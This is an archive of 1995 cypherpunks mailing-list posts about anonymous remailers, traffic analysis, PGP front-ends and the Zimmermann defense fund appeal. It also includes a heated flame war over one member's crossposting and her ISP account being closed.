Killfiles.  I have never wanted to killfile a person before, this is a 
big step for me. 8)




i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Fri, 6 Jan 95 20:03:52 PST
To: cypherpunks@toad.com
Subject: Can someone verify this conjecture for me?
Message-ID: <m0rQSSj-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


I'd like to make sure I understand how a digital mix works.  I've read
Chaum's paper on it, but hey, there's a reason why I don't have a Phd
in spite of having all the coursework done.

It seems like it solves two separate problems: 1) foiling traffic
analysis, and 2) foiling a cheater remailer.  The problems are
separate, really, because if you really, really trust the remailer (as
many people do Julf), then 2) isn't a problem.  All you need to do is
solve 1.  Or, you can solve 1) by using a single remailer.  A
necessary but not sufficient step to foil traffic analysis is to strip
headers.

If you trust any one remailer, then you needn't bother using any other
ones (assuming that remailer has enough traffic, delay, mixing, etc to
foil traffic analysis).  There's no real difference between using a
set (N>1) of trusted remailers and using only one, because you can
consider the set of remailers to be a single remailer from the point
of view of traffic analysis.

But to be sure, at least one of your remailers MUST attempt to foil
traffic analysis, otherwise you're effectively mistrusting the
remailer operators but trusting the NSA (or FBI).  As I said a month
or two ago, you MUST assume that the spooks are watching all the
remailers.  It's cheap and easy, therefore it's being done.

Sorry for the Crypto 101, but I figure that there are other people out
there who don't understand it.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Fri, 6 Jan 95 20:11:53 PST
To: "L. Todd Masco" <cactus@hks.net>
Subject: Re: Peter D. Lewis
In-Reply-To: <199501070053.TAA00768@bb.hks.net>
Message-ID: <Pine.3.89.9501062325.B10171-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


wired has balls. the economist has to figure out what all this stuff 
means in the real world. wired just sells ads around the events it 
covers. lewis is innocent compared to wanton scum like kelly. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 6 Jan 95 20:13:43 PST
To: cypherpunks@toad.com
Subject: Carol Anne Whoever
Message-ID: <ab33c51401021004a87a@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


I don't care very much about Carol Anne whoever.  I don't care very much
about her plight.
I have received just enough information about her plight (via this list,
oddly enough), to know that I don't have enough information to tell who I
agree with in this dispute.  I don't particularly want to get enough
information to do that, because I don't care.  If I did care, I would get
the information through some other method then this list, because it seems
completely inappropriate.

The merits of netcom vs. smaller services seem irrelevant to this list,
too, in my mind, and I don't care to see those either.  If you were
wondering.

I also don't care to see 10 or 20 posts a day by Carol Anne Whoever which
are resposes to random crypto-related posts wherein the whole post is
quoted, and then Carol Anne adds "me too!", or "Does that remind you of a
certain sysadmin? giggle, giggle.", or "Good point!"  I am at a loss as to
why Carol Anne thinks the details of her life, and her inane "me too"s are
of interest to the cypherpunks list.  I guess we can't stop Carol Anne from
sending this stuff to the list anyways (but I can killfile her), but it
would be nice if people would stop responding to her stuff.  Obviously if
you really feel it's an appropriate use of the list to do so anyway, I
can't stop you.  I'm just asking you to for purely selfish reasons, so I
don't feel the need to killfile people who make otherwise intelligent
posts, and miss those posts.

[I'm beginning to suspect that Carol Anne, and her sysadmin too, are just
tentacles of Detweiler.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Fri, 6 Jan 95 22:26:18 PST
To: cactus@seabsd.hks.net (L. Todd Masco)
Subject: Re: Files and mail
In-Reply-To: <199501070607.BAA04310@bb.hks.net>
Message-ID: <m0rQUbx-0004IOC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> Anybody want to offer odds on whether or not this merry little exchange
> will be reported in Wired as news?

No bet. ;)  The computer press is pretty imature, they'll report almost
anything.

Personally, I think both Carol Anne Braddock and Mike Horwath BOTH need to
grow up, along wih a substantial number of the snipers and slammers and
back-seat-driver commentators regarding this thread.

Maybe they ought to restrict net access by age?  25 or so oughta be a good
age ... anyone younger is barred from access, or unless they provide
evidence that they have a maturity level greater than that of your average
six-year-old.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager

Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

"What's the use of distant travel if only to discover - you're homeless in
your heart."  --Basia, "Yearning"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: No Taxes through No Government <schirado@lab.cc.wmich.edu>
Date: Fri, 6 Jan 95 20:26:33 PST
To: cypherpunks@toad.com
Subject: Re: Outlawing Anonymity
Message-ID: <199501070427.XAA02486@grog.lab.cc.wmich.edu>
MIME-Version: 1.0
Content-Type: text


TC May writes:

>I see no prospect whatsover that a ban on anonymous mail could be
>implemented, enforced, or upheld in the courts.

Never say never.

Even coming from Tim, this surprises me just a little. Never
think that government won't do something. The effectiveness
of their 'solution' may be minimal, but billions can be
wasted, and countless lives ruined, before it can be stopped (or
more likely, dammed; once government achieves power, it is loath
to relinquish it without a death struggle).

Some nation's groups of 'leader'-thugs may be in a better
position than others to go for such a power grab at this moment
in time. But any and all of them should be constantly scrutinized
for the inevitable slide down that slippery slope. The "article"
by our pal Martha which the SF Chronicle had the poor judgment
and atrociously swollen cojones to publish, is one of the most
dramatically explicit warning signs of the year so far... and NOT
because the year is yet so young.

And to think, Tim used to be the pessimist on this list, saved only
by the reassurances of Duncan and Sandy... :-S




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nissim@acs.bu.edu
Date: Fri, 6 Jan 95 20:48:25 PST
To: pcassidy@world.std.com
Subject: Re: Peter D. Lewis
Message-ID: <199501070438.XAA101470@acs.bu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I'm unfamiliar with what it is people have against Kevin Kelly.
Why "wanton scum"?  people might want to send mail not cc:ed to
cypherpunks to keep the list from experiencing too much of a burden
here.

-A




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doumakes@netcom.com (Don Doumakes)
Date: Fri, 6 Jan 95 21:55:59 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <199501070554.VAA14679@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> One thing to keep in mind, though, is that it's really the _last_ remailer
> in the chain that's taking the most heat, and it would be nice if they got
> payed.  There's also an issue of some remailers refusing to be last in the
> chain, so they dont' expose themselves so much.

I agree, this is an important issue.  But I think it's a separate one
from the question of how users pay for the service.  In other words,
once there's a consensus to have a Guild of for-pay remailers, all the
users should have to do is pay the Guild once.  The Guild can then
haggle over how to divvy up the money.  Hard jobs, such as posting anon
news, should command more money.

On the issue of the medium of exchange, I favor blinded digital cash
with its absolute anonymity.  The "remailer in a box" that we spoke of
earlier would do well to include this capability.

- --
______________________________________________________________________
Don Doumakes             Finger doumakes@netcom.com for PGP public key

Foxpro databases built to your specifications.  Email me for details.

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLw3RTBtumcu2AjihAQF+DQQAmhQxuMl4C6VzZLD+mHF5i0OAjLUZAhV+
eNOi4F6bUBsDyfm7TmxxWMsiJRlJFrKhIMT+A16lmBZPdQ/pnZjQSk2keLyXgs0N
phsPmZsTWGZMOyWGH+Hh2ggBc5syhmZxuTWwHFqqbAKTVoYRC4esxW8g/lTKot7F
drI0amkbq20=
=pHqY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Fri, 6 Jan 95 21:13:17 PST
To: cypherpunks@toad.com
Subject: Netcom is not a good example (Was: Re: Files and mail)
In-Reply-To: <199501070010.QAA02210@netcom10.netcom.com>
Message-ID: <Pine.SUN.3.91.950107000218.29538D-100000@unix2.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Mike Duvos wrote:

[ big monolithic service providers like Nyetcom are the best and will 
crush all you piddly little upstart ISPs ]

> Big service providers like Netcom don't interfere with customer
> use of the resources they sell, except when network functionality
> is impacted.  Even in such cases, they try to reach an
> understanding with the user, and terminate accounts only as a
> last resort.  Accounts don't vanish when "the guy who owns the
> machine" decides to throw a tantrum.

	Yeah. They only kill accounts when people criticize NetCruiser. :-P

	Nyetcom is hardly an example of a quality service provider. They
suffer periodic long term news and email delays; their service personnel
are rude, slow, and unprofessional (read: Bruce Woodcock & the above
incident); their security has been compromised countless times; their FTP
server is constantly overloaded; their toy software NetCruiser generates
nonconformant Usenet articles; their 18 (!) machines are constantly
overloaded that it takes a good five minutes to respond to a finger
request; they have no http:// support. They are home to some of the most
infamous net.kooks and net.cretins (like Tom Servo, currently), and their
net.reputation sucks.  Frankly, I'd rather have a Winternet account than a
Netcom account. 

ObCypherpunks: sameer's system, the Community Connexion, suffers *none* 
of these problems. http://www.c2.org or <info@c2.org> for more 
information. sameer supports PGP and the running of anonymous remailers 
on his system. Check it out, send him money.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Todd Masco" <cactus@hks.net>
Date: Fri, 6 Jan 95 21:52:52 PST
To: cypherpunks@toad.com
Subject: Re: Peter D. Lewis
Message-ID: <199501070558.AAA04212@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Tim sez:
 > I think Kelly is a person of high integrity. It's hard to demand much
 > more than this.

I simply can't think much of a magazine that has cover stories deriving
entirely from kiddie-kracker squabbles.

Kelly may have plenty of integrity but that's not the word that the
magazine "Wired" usually brings to mind.  It's not the profit motive or
the ads that get me: running a business, I know you can't be picky about
who you take money from. It's the lack of meaningful content that annoys
me.  As with Lewis, frequenly when they're discussing something I know
something about their stories are fraught with inaccuracies and rumours.
My personal favorite is when they list reporters among the "experts" on
their technology-watch light bites.

Their entire approach is to cast 

Like "Seventeen," "Wired" should prepend "don't you wish you were" to
its title.
- --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw4tbioZzwIn1bdtAQEM7gF9EZE2qciEPOqQTYjwiqDF9vakwzSS3DSh
ZJy1S0gTP7kNSTDnm/8UuoVOxehFhJ+X
=g0sd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Fri, 6 Jan 95 22:02:08 PST
To: cypherpunks@toad.com
Subject: Re: Files and mail
Message-ID: <199501070607.BAA04310@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----


Anybody want to offer odds on whether or not this merry little exchange
will be reported in Wired as news?
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLw301xNhgovrPB7dAQFj3gP8CJV4TyRUl+sEQRHX6qH2TKK+B+JKLrwk
kUM7Y0yaY2ZwScBnYRva5/Pyu8r70i2Z3yQUQFF7ECasxHwrYftfWweD0/4Pc4ws
qEGNfGIheHtnP/J0B7G7xsIyAMSZIlUD3RCQ49o4BOpWk6bev4t5i/RP10yK9sit
dA1go4Jiaag=
=eQPF
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw4vqSoZzwIn1bdtAQER/QF/SkRQGEEjHn+E0SZEiWs0McAvRccuzxFQ
Uv76Kmmya6EMxTJOJFtatP1uQ7V6JmSA
=g1Bd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Todd Masco" <cactus@hks.net>
Date: Fri, 6 Jan 95 22:10:57 PST
To: cypherpunks@toad.com
Subject: Re: Too Much!
Message-ID: <199501070616.BAA04394@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----


In article <Pine.NXT.3.91.950106202333.12708A-100000@kisa> you write:
>  Yet again I have un-subbed from the list because of the S/N ratio. And 
>things were looking so good there for a while.

You might want to try reading it from NNTP, via c2.org or hks.net.  You
can then use Kill files.

Wonderful beasts, those.

(And if more people do this, we could actually try to use some
 distributed mechanisms such as that that strn uses.)
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLw32/xNhgovrPB7dAQEUBwQAhWOYKkqwHGyi2eFfnYt+8LsFU+Af3Lsl
sT1VDjICu1XIAhswVfKL+h7Dn9r1pmeNHtJFF0V8S/fKGVOU5dhv+gZZwVOTjbnL
a2g+MTZkh/vonVy5PLDELrpeRlcVdxR+abcg9AWahjYCFlua8NR5GjiN6iKeC1C8
o3F377//PSU=
=rxxD
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw4xuCoZzwIn1bdtAQHTNgF/T9OR6yUCu05KZW4s3MSHptRoclc31xO8
5O0jAXDA0c9oE/39smLZ++I6OoGh7Wiq
=5/FC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 23:18:51 PST
To: "Paul J. Ste. Marie" <pstemari@erinet.com>
Subject: Soapbox mode on!(but short)
In-Reply-To: <9501062310.AB20311@eri.erinet.com>
Message-ID: <Pine.3.89.9501070144.A14739-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Paul J. Ste. Marie,

I was quietly going through my mail after an eight hour layoff.
The first thing you do is lie.

I have called you a liar. Point Blank!

And for the honor of this very list, so that there is some
credibility, I shall retrieve from a tin reader the actual
posting, COMPLETE WITH HEADER.  

And what makes creeps like you going is the ability to continue,
to spread those lies. 

[soapbox mode on]

THE POSTING WENT UNANSWERED FOR 3 DAYS IN 10 NEWSGROUPS.

UNANSWERED...NADA ...NO BYTES...NO BITS.....NO ANYTHING

THE FIRST PERSON TO RESPOND WAS HORWATH, ISSUING SOME KIND

OF REALLY LAME APOLOGY...TO WHOM NO ONE KNOWS, FOR NO ONE

HAD RESPONDED....GET IT....CAN YOU HANDLE PLAIN ENGLISH?

NO MR. STE. MARIE I WILL NOT START RUMOR OR CONTINUE RUMOR.

YOU HAVE LIED TO THE FINE PEOPLE OF CYPHERPUNK LIST.

YOU HAVE WASTED THEIR TIME AND THEIR BANDWITH (THEIR LIFE)

FOR THE MOST IMPORTANT CODE YOU CAN EVER WRITE IS THE TRUTH.

[soapbox mode off]

Please pardon me now, while I retrieve the actual postings.

Love Always,

Carol Anne

On Fri, 6 Jan 1995, Paul J. Ste. Marie wrote:

> At 08:58 AM 1/6/95 +0000, Nesta Stubbs wrote:
> >On Fri, 6 Jan 1995, Carol Anne Braddock wrote:
> > ... 
> >> I "crossposted" it to my favorite 10 newsgroups. Just 10.
> >> Some creep complained. (we'll get to him a bit later).
> >>
> >ten is not a large number when it comes o cross-posting on soem topics, I 
> >can think of at lezast tewenty newsgroups where the PRZ letters and such 
> >would make alot of sense and be on topic.  This just goes to show the 
> >soemtimes reactionar steps people take to control spamming.  ...
> 
> The discussion on alt.current-events.net-abuse seemed to indicate that the 
> claim of "Just 10" above is a slight understandment.  The newsgroups seem to 
> have been hit alphabetically, and I believe the total count was in the hundreds.
> 
>     --Paul J. Ste. Marie
>       pstemari@well.sf.ca.us, pstemari@erinet.com
> 
> 

Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@vortex.mm.com>
Date: Sat, 7 Jan 1995 01:26:50 -0600
To: carolann@vortex.mm.com
Subject: (fwd) Re: Phil Zimmermann
Message-ID: <283c371c68a89a4d2ae07bc0ed855b15@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Organization: Minnesota MicroNet, St. Paul, MN

Path: vortex.mm.com!news2.mr.net!mr.net!winternet.com!drechsau
From: drechsau@winternet.com (Mike Horwath)
Newsgroups: soc.support.transgendered,alt.transgendered,mn.general,alt.sex.femdom,alt.artcom,alt.sex.bondage,alt.sex,comp.infosystems.www.users,alt.dreams.lucid,alt.dreams
Subject: Re: Phil Zimmermann
Followup-To: soc.support.transgendered,alt.transgendered,mn.general,alt.sex.femdom,alt.artcom,alt.sex.bondage,alt.sex,comp.infosystems.www.users,alt.dreams.lucid,alt.dreams
Date: 5 Jan 1995 23:57:09 GMT
Organization: StarNet Communications, Inc
Lines: 12
Message-ID: <3ei10l$mvo@blackice.winternet.com>
References: <3dtkaj$lg8@news-2.csn.net> <3dvdsb$ads$1@mhade.production.compuserve.com> <mpjD1MvLD.4Ht@netcom.com> <Pine.SUN.3.91.950102035552.23484I-100000@icicle.winternet.com>
NNTP-Posting-Host: icicle.winternet.com
X-Newsreader: TIN [version 1.2 PL2]

We wish to apologize for Carol Anne's actions while with Winternet.

This account has been deleted for breach of our AUP.

Questions, comments, problems or general bitching, please reply to this
message.

--
Mike Horwath    IRC: Drechsau    LIFE: Lover     drechsau@winternet.com
Winternet:  info@winternet.com              root@jacobs.mn.org <- Linux!
Twin Cities area Internet Access:  612-941-9177 for more info
Founding member of Minnesota Coalition for Internet Accessibility

--
Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@vortex.mm.com>
Date: Sat, 7 Jan 1995 01:26:51 -0600
To: carolann@vortex.mm.com
Subject: (fwd) Re: Phil Zimmermann
Message-ID: <1e5cdf203746b1a0144dbaf6df3710d1@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Path: vortex.mm.com!news2.mr.net!mr.net!skypoint.com!jlogajan
From: jlogajan@skypoint.com (John Logajan)
Newsgroups: mn.general
Subject: Re: Phil Zimmermann
Date: 6 Jan 1995 05:09:12 GMT
Organization: SkyPoint Communications, Inc.
Lines: 13
Message-ID: <3eij9o$8nu@stratus.skypoint.net>
Reply-To: jlogajan@skypoint.com
NNTP-Posting-Host: mirage.skypoint.com
X-Newsreader: TIN [version 1.2 PL2]

Mike Horwath (drechsau@winternet.com) wrote:
: We wish to apologize for Carol Anne's actions while with Winternet.
: This account has been deleted for breach of our AUP.
: Questions, comments, problems or general bitching, please reply to this
: message.

Since you are publicly accusing Carol Anne of "breach of our AUP", you
better explain what horrible crime she committed.

--
 - John Logajan -- jlogajan@skypoint.com  --  612-633-0345 -
 - 4248 Hamline Ave; Arden Hills, Minnesota (MN) 55112 USA -
 - WWW URL =  http://www.skypoint.com/subscribers/jlogajan -

--
Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@vortex.mm.com>
Date: Sat, 7 Jan 1995 01:26:52 -0600
To: carolann@vortex.mm.com
Subject: (fwd) Re: Phil Zimmermann
Message-ID: <d7eace1bb17a682f21e5e70b53d0e1c8@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Path: vortex.mm.com!news2.mr.net!mr.net!winternet.com!news
From: "Mr.Fish" <mwalleye@winternet.com>
Newsgroups: soc.support.transgendered,alt.transgendered,mn.general,alt.sex.femdom,alt.artcom,alt.sex.bondage,alt.sex,comp.infosystems.www.users,alt.dreams.lucid,alt.dreams
Subject: Re: Phil Zimmermann
Date: 6 Jan 1995 05:39:51 GMT
Organization: StarNet Communications, Inc
Lines: 16
Message-ID: <3eil37$6a@blackice.winternet.com>
References: <3dtkaj$lg8@news-2.csn.net> <3dvdsb$ads$1@mhade.production.compuserve.com> <mpjD1MvLD.4Ht@netcom.com> <Pine.SUN.3.91.950102035552.23484I-100000@icicle.winternet.com> <3ei10l$mvo@blackice.winternet.com>
NNTP-Posting-Host: mwalleye.winternet.com

> We wish to apologize for Carol Anne's actions while with Winternet.
> 
> This account has been deleted for breach of our AUP.
> 
> Questions, comments, problems or general bitching, please reply to this
> message.
> 
> --
> Mike Horwath    IRC: Drechsau    LIFE: Lover     drechsau@winternet.com


Looking at the groups that you cross-posted, I sure as heck would like to 
know what she did to get kicked off?;) What the heck do you have to 
apologize for Mike? Unless you might of been involved too?;) I told you
you've been working too hard.
Come on now bud, give us the lowdown!

--
Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RopeGun@calvino.alaska.net (Oren Tanay)
Date: Sat, 7 Jan 95 01:59:39 PST
To: cypherpunks@toad.com
Subject: pgp shells for windows....
Message-ID: <Chameleon.950107014244.RopeGun@RopeGun.alaska.net>
MIME-Version: 1.0
Content-Type: text/plain


I've read the pgp docs and several other unofficial documents on pgp and I have come to the conclusion 
that a shell for pgp is the most sensible approach using such a powerfull encryption program.  I've 
searched to the best of my abilities and have found several pgp shells for windows, but all of them seem to 
assume that the user has an above average understanding of the workings of pgp and all of its uses.  At 
this point your probably thinking that I'm looking for an easy way to get around learning pgp the hard way, 
but I'm not...   the whole idea of pgp is that privacy and security be available to anyone, using any platform. 
 But ease of use was not really one of the features built into pgp.  If anyone can refer me to a windows 
shell for pgp (for dummys :-)   ) I would like to get a copy of it for distribution on the bullitin board nets...
   Was I to verbose?
          \\|||||||//
           | o o |     Oren Tanay
           |   J   |     RopeGun@alaska.net
             \---        www.alaska.net/~RopeGun/RopeGun.html 

"My Cat Can Eat A Whole WaterMelon"


From owner-cypherpunks  Sat Jan  7 02:21:34 1995



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RopeGun@calvino.alaska.net (Oren Tanay)
Date: Sat, 7 Jan 95 02:21:34 PST
To: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Subject: Re: pgp shells for windows....
Message-ID: <Chameleon.950107020459.RopeGun@RopeGun.alaska.net>
MIME-Version: 1.0
Content-Type: text/plain


winpgp2.6 was the most succesfull pgp shell I could find but the interface was stale and non descript. 
including the fact that when it executed the commands it opened a window and I was interfacing with the 
dos pgp interface, I found that a little redundant for a shell program; but then again I'm not sure if an 
interface with pgp can be done any other way.
          \\|||||||//
           | o o |     Oren Tanay
           |   J   |     RopeGun@alaska.net
             \---        www.alaska.net/~RopeGun/RopeGun.html 

"My Cat Can Eat A Whole WaterMelon"


From owner-cypherpunks  Fri Jan  6 23:59:11 1995



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 23:59:11 PST
To: Cypherpunks@toad.com
Subject: From me to me to you...The Actual Article
Message-ID: <Pine.3.89.9501070130.A14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear All of You,

This is the article, and what I did with it. It is complete in it's

entireity, from the bang paths, to the crosspostings. Please study them

carefully, for my next post will contain the first response to the article,

three days later. ALL DURING THIS TIME, I WAS LED TO BELIEVE, THROUGH PHONE

CALLS THAT THIS WAS "GOING TO BE INVESTIGATED SOON". NOTHING OF THE SORT

HAPPENED. NO ONE IN ANY OF THE TEN GROUPS RAISED A SINGLE OBJECTION. PERIOD.

             I believe in your capacity to fairly judge.

               My response to the first complaint lies 
               
                  still censored in my mail reader.
                     
                    For if .1% of all the Usenet

                         is inappropriate to

                            post to, when

                               will it
                             
                                become

                                 just

                                 .01%
                                  ?
Now, the article,



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@vortex.mm.com>
Date: Sat, 7 Jan 1995 01:26:26 -0600
To: carolann@vortex.mm.com
Subject: (fwd) Re: Phil Zimmermann
Message-ID: <53ae08506afed0671ca88cb1b531a06e@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Path: vortex.mm.com!news2.mr.net!mr.net!umn.edu!spool.mu.edu!howland.reston.ans.net!pipex!uunet!winternet.com!icicle.winternet.com!carolann
From: Carol Anne Braddock <carolann@icicle.winternet.com>
Newsgroups: soc.support.transgendered,alt.transgendered,mn.general,alt.sex.femdom,alt.artcom,alt.sex.bondage,alt.sex,comp.infosystems.www.users,alt.dreams.lucid,alt.dreams
Subject: Re: Phil Zimmermann
Date: Mon, 2 Jan 1995 04:05:13 -0600
Organization: StarNet Communications, Inc
Lines: 317
Message-ID: <Pine.SUN.3.91.950102035552.23484I-100000@icicle.winternet.com>
References: <3dtkaj$lg8@news-2.csn.net> <3dvdsb$ads$1@mhade.production.compuserve.com> <mpjD1MvLD.4Ht@netcom.com>
NNTP-Posting-Host: icicle.winternet.com
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
In-Reply-To: <mpjD1MvLD.4Ht@netcom.com> 


Please read, and help if you can.
You can get PGP at my WWW HomePage.
http://www.winternet.com/~carolann

Love Always,

Carol Anne
Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                               REGISTERED PGP KEY NO.0C91594D     
carolann@icicle.winternet.com       finger carolann@winternet.com |more
***********************************************************************
My WWW Homepage Page is at:    http://www.winternet.com/~carolann


On Fri, 30 Dec 1994, Michael Paul Johnson wrote:

> Christopher W. Geib <72144.1426@CompuServe.COM> writes:
> 
> >Phil,
> 
> >Could you repost here the address where we can send our support?
> 
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
>             Phil Zimmermann Legal Defense Fund Appeal
> 
>     In November, 1976, Martin Hellman and Whitfield Diffie announced
> their discovery of public-key cryptography by beginning their paper
> with the sentence: "We stand today on the brink of a revolution in
> cryptography."
> 
>     We stand today on the brink of an important battle in the
> revolution they unleased.  Philip Zimmermann, who encoded and released
> the most popular and successful program to flow from that discovery,
> Pretty Good Privacy ("PGP"), may be about to go to court.
> 
>     It has been over fourteen months now since Phil was first informed
> that he was the subject of a grand jury investigation being mounted by
> the San Jose, CA, office of US Customs into the international
> distribution, over the Internet, of the original version of the
> program.  On January 12th, Phil's legal team will meet for the first
> time with William Keane, Assistant US Attorney for the Northern
> District of California, who is in charge of the grand jury
> investigation, in San Jose.  An indictment, if one is pursued by the
> government after this meeting, could be handed down very shortly
> thereafter.
> 
>     If indicted, Phil would likely be charged with violating statute 22
> USC 2778 of the US Code, "Control of arms exports and imports."  This
> is the federal statute behind the regulation known as ITAR,
> "International Traffic in Arms Regulations," 22 CFR 120.1 et seq. of
> the Code of Federal Regulations.  Specifically, the indictment would
> allege that Phil violated 22 USC 2778 by exporting an item listed as a
> "munition" in 22 CFR 120.1 et seq. without having a license to do so.
> That item is cryptographic software -- PGP.
> 
>     At stake, of course, is far more than establishing whether Phil
> violated federal law or not.  The case presents significant issues and
> will establish legal precedent, a fact known to everyone involved.
> According to his lead counsel, Phil Dubois, the US government hopes to
> establish the proposition that anyone having anything at all to do with
> an illegal export -- even someone like Phil, whose only involvement was
> writing the program and making it available to US citizens and who has
> no idea who actually exported it -- has committed a federal felony
> offense.  The government also hopes to establish the proposition that
> posting a "munition" on a BBS or on the Internet is exportation.  If
> the government wins its case, the judgment will have a profound
> chilling effect on the US software industry, on the free flow of
> information on the emerging global networks, and in particular upon the
> grassroots movement to put effective cryptography in the hands of
> ordinary citizens.  The US government will, in effect, resurrect
> Checkpoint Charlie -- on the Information Superhighway.
> 
>     By now, most of us who are reading this know about Phil and the
> case, whether by having the program and reading the doc files or by
> seeing reports in the Wall Steet Journal, Time, Scientific American,
> the New York Times, Wired, US News and World Report, and hundreds of
> other news outlets; on Usenet groups like talk.crypto.politics or
> alt.security.pgp; or by listening to Phil give talks such as the one he
> gave at CFP '94 in Chicago.  We know that PGP has made great strides
> since version 1.0, and is now a sophisticated encryption and
> key-management package which has become the de facto standard in both
